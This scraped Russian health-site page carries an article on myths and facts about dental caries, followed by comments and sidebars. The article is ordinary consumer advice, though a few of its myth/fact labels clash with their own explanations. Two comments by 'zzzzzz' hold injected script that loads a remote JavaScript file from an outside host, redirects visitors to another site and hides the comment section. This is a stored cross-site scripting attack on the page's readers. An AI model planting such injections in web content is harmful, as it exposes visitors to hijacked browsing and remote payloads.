Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Мифы и правда о кариесе  >>  Мифы и правда о кариесе
 
Обратная связь
 

Мифы и правда о кариесе

Размер шрифта
18 июня 2014 00:00
  • google_analytics: false
  • Нравится

В нашей статье мы расскажем о самых популярных мифах и фактах о кариесе и о том, как его предотвратить и лечить.

Мифы и правда о кариесе

1. Сахар – основная причина возникновения кариеса

Миф, но это почти факт.

На самом деле, кислота, производимая бактериями во рту, является причиной кариеса. Тем не менее, триггер к производству этой кислоты – употребление углеводов (а сахар – это углевод). Рис, картофель, хлеб, фрукты и овощи – это тоже углеводы.

После того, как кислота разъедает зуб, у бактерий появляется «уютное местечко», где они и обосновываются, особенно если ваша зубная щетка или нить не могут туда попасть. Бактерии продолжают усваивать углеводы и вырабатывают кислоты, кариес становится все больше.

Важный факт: кариес возникает не из-за количества углеводов, а из-за продолжительности их пребывания на ваших зубах. Если вы едите много углеводов на обед, то ваши зубы подвергаются единичному воздействию, но если вы проводите день, потягивая сладкие напитки, – это непрерывное воздействие, оно очень вредно для зубов.

2. Воздействие кислых продуктов, например, лимонов, является причиной кариеса

Факт. Кислотные продукты, такие как лимоны, цитрусовые соки или безалкогольные напитки не вызывают кариес, но они опасны для эмали.

Кислоты наносят вред эмали и ослабеваю зубы. Когда эмаль сильно истончается, то уже основной дентин подвергается негативному воздействию и доступен для кариеса.

3. Дети чаще страдают от кариеса, чем взрослые

Миф. С помощью пломб и фторированных ополасиквателей случаи кариеса у детей сократились в два раза за последние 20 лет.

Тем не менее, среди пожилых людей кариес не менее распространенная напасть. Одной из причин является то, что некоторые лекарства сильно сушат ротовую полость, а слюна имеет жизненно важное значение в борьбе с кариесом, потому что она помогает нейтрализовать кислоты, обладает дезинфицирующими свойствами, смывает бактерии и помогает предотвратить прилипания еды к зубам.

4. Приложив таблетку аспирина к зубу, можно избавиться от зубной боли

Миф. Проглотив аспирин вы уменьшите зубную боль – это факт. Но вот прикладывание аспирина к больному месту не лучшая идея, поскольку таблетка обладает кислой средой, а поместив ее рядом с зубом, вы в лучшем случае только усилите боль, а в худшем – это вызовет абсцесс.

5. Все пломбы необходимо менять

Миф. Амальгамные или композитные пломбы следует менять, только если они сломаются или если кариес выйдет за их пределы. Если ни одна из этих проблем не возникает, вы можете ходить с этой пломбой в течение всей жизни.

Пломбы имеют срок эксплуатации, но это зависит от таких вещей, как износ зубов и правильная гигиена полости рта. Если вы чистите зубы два раза в день с фторосодержащей зубной пастой, используете нить и ополаскиватель, то кариес будет беспокоить вас меньше, а пломбы сохранятся дольше.

6. Если у вас кариес, вы знаете об этом

Миф. Это большой-большой плохой миф. Мягкий кариес не вызывает симптомов. Боль, которую мы связываем с кариесом возникает, когда кариес прогрессирует и приводит к повреждению нерва.

Вовремя не вылеченный кариес может потребовать в последствие намного более дорогих процедур, таких как депульпирование, поэтому регулярные стоматологические осмотры очень важны. Кроме того, если кариес появился, то он уже не исчезнет, а лишь будет продолжать расти.

7.Если однажды вылечить кариес, он не появится вновь

Факт. Вы можете получить кариес позже и в других областях зуба, но в том же месте кариозный распад не появится, особенно если вы поддерживаете хорошую гигиену ротовой полости. Иногда пломба стареет, и зуб начинает разрушаться, в таком случае бактерии могут попасть туда и кариес появится снова.

8. Кариес развивается между зубами

Факт. Везде, где бактерии могут укрыться от зубной щетки или нити, повышен риск развития кариеса.Углубления на задней стороне передних зубов также являются хорошим местом для развития кариеса. И да, места между зубами также являются отличным местом для развития кариеса, особенно если вы не пользуетесь зубной нитью. Не забывайте, что использование фтористого ополаскивателя дает дополнительную защиту.

9. Зазоры между зубамиспособствует возникновению кариеса

Факт. Если у вас есть небольшой зазор между зубами, который вы не можете тщательно очистить от налета, вы более склонны к развитию кариеса.Большие зазоры легче содержать в чистоте, они менее склонны к развитию кариеса.

10. Сколы и трещины в зубах приводят к кариозному распаду

Факт. Трещины и сколы создают «тайник» для бактерий – место, недоступное для зубной щетки, и эти районы являются наиболее склонными к разрушению зубов. Использование фторированного ополаскивателя для полости рта может снизить риск кариеса. В последнее время все больше людей страдают от трещин в зубах из-за шлифовки. Стресс и беспокойство вырабатывают привычку скрежетать зубами, которая также наносит непоправимый вред здоровью зубов.

11. Чувствительность зубов означает начало кариозного распада

Миф. Чувствительность зубов может просто свидетельствоватьо сверхчувствительных зубах или рецессии десны – состоянии, при котором обнажается корень зуба.

Также у вас может быть трещина, или сломанный зуб, или же необходима депульпация. Существует множество причин (кариес в их числе), которые могут привести к повышенной чувствительности зубов.

12. Кариес является единственной причиной для удаления нерва зуба

Миф. Удаление корневого канала необходимо только в том случае, если нерв внутри зуба поврежден. Невылеченный кариес может в конечном итоге привести к повреждению нерва, но есть и множество других причин.

Трещины, переломы или другие виды травм зуба также могут вызвать повреждение нерва. Во многих случаях стачивание и шлифовка могут травмировать зуб достаточно сильно, чтобы он нуждался в депульпировании.

13. Стачивание и шлифовка зубов могут привести к кариесу

Факт. Стачивание и шлифовка являются одними из самых разрушительных вещей, для ваших зубов. При нормальном жевании, зубы соприкасаются на миллисекунды, страдая незначительно. Но стачивание и шлифовка оказывают огромное давление на зубы, особенно в течение длительных периодов.

В конечном итоге это может привести к повреждению, трещинам и переломам зубов, а кариес будет формироваться более быстрыми темпами. Как правило,стачивание и шлифовка необходимы для установки коронок или для лечения травмированного нерва.

14. Нет нужды беспокоиться о молочных зубах

Миф. Молочные зубы удерживают пространство для постоянных зубов. Если оставить без лечения кариес молочных зубов, со временем проблемы могут перерасти в серьезные боли и абсцессы. Иногда инфекция может распространиться на другие участки организма, а в редких случаях даже может привести к смерти.

15. Зубная нить и полоскание – это лучшие способы предотвращения кариеса

Факт. Абсолютно верно, профилактика является ключевым методом. Вы должны удалять бактерии с зубов: чистить зубы два раза в день фторсодержащей зубной пастой, использовать зубную нить и не забывать о полоскании. Противомикробные полоскания убивают бактерии, уменьшают налет и неприятный запах изо рта, а также снижают риск гингивита. Тщательная гигиена полости рта избавит вас от множества проблем.

Все о здоровье зубов узнайте из нашего проекта «Здоровые зубы».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

21 июня 2014 в 15:10

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как быть здоровым ничего не делая   Красивая улыбка – лучший новогодний подарок!   Зубная щетка полна бактериями из попы! Как не заболеть!   Чем хуже зубы, тем меньше рака! Кариес защищает от рака шеи!  
28 мая 2013Бактерии спасут человечество от ожирения! Новый метод похудения от гарвардских ученых 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Что ваши зубы говорят о вас?
Как сохранить мозги в 30 лет
Как решить все проблемы ваших зубов!

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.